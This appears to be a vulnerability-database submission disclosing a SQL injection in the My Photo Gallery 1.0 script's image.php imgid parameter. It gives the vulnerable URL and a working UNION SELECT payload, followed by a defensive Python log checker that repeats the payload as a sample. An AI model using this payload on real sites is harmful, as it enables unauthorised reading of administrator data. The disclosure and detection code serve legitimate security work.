| Field | Value |
|---|---|
| Title | My Photo Gallery – SQL Injection |
| User | KAAN KAMIS (UID 213) |
| Submitted | 27/01/2017 09:32 (9 years ago) |
| Moderated | 27/01/2017 13:54 (4 hours later) |
| Status | Accepted |
| VulDB entry | 96062 [Gallery My Photo Gallery 1.0 image.php imgid injection SQL] |
| Points | 17 |

Description

Introduction

Exploit Title: My Photo Gallery – SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

My Photo Gallery is a free, user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can view the images and validate, edit or delete them.
The script comes with a very user-friendly admin system where you can change and add many things, such as categories, images, member details, site appearance and much more.

Type of vulnerability:
An SQL injection vulnerability in My Photo Gallery allows attackers to read arbitrary administrator data from the database.

Vulnerable URL:
http://localhost/my_photo_gallery/image.php?imgid=[payload]

Vulnerable parameter: imgid
Method: GET

Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
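As an added defensive example (not part of the advisory and not the My Photo Gallery code), the Python below classifies image.php requests whose imgid is anything other than a bare integer as suspicious, which is the same strict type check that a fix inside image.php needs, and decodes the MySQL 0x... string literals so an analyst can read the marker strings wrapped around the CONCAT() result in a logged payload. The request lines are constructed samples; the last one carries the advisory's payload URL-encoded.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines (not real traffic); the last one carries
# the payload quoted in the advisory, URL-encoded as a browser would send it.
SAMPLE_REQUESTS = [
    "GET /my_photo_gallery/image.php?imgid=42 HTTP/1.1",
    "GET /my_photo_gallery/image.php?imgid=7&page=2 HTTP/1.1",
    "GET /my_photo_gallery/image.php?imgid=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,"
    "CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,"
    "0x716b766b71)--%20 HTTP/1.1",
]

INTEGER_ONLY = re.compile(r"^[0-9]+$")
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def check_imgid(request_line):
    """Classify one request line as ('ok' | 'suspicious' | 'skip', reason).
    imgid is an image row id, so the only legitimate value is a bare integer;
    the same check (or an integer-typed bind in a prepared statement) inside
    image.php is what closes the injection."""
    parts = request_line.split(" ")
    if len(parts) < 2 or not parts[1].startswith("/my_photo_gallery/image.php"):
        return ("skip", "not image.php")
    values = parse_qs(urlsplit(parts[1]).query).get("imgid", [])
    if not values:
        return ("suspicious", "imgid missing")
    if len(values) > 1:
        return ("suspicious", "imgid supplied more than once")
    if INTEGER_ONLY.match(values[0]):
        return ("ok", "")
    return ("suspicious", "imgid is not an integer: %r" % values[0][:32])


def decode_hex_literals(payload):
    """Render MySQL 0x... string literals as text; odd-length runs are not
    valid byte strings and are skipped."""
    return [bytes.fromhex(h).decode("ascii", "replace")
            for h in HEX_LITERAL.findall(payload) if len(h) % 2 == 0]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        verdict, reason = check_imgid(line)
        print(verdict, reason)
        if verdict == "suspicious":
            print("  hex literals:", decode_hex_literals(line))
```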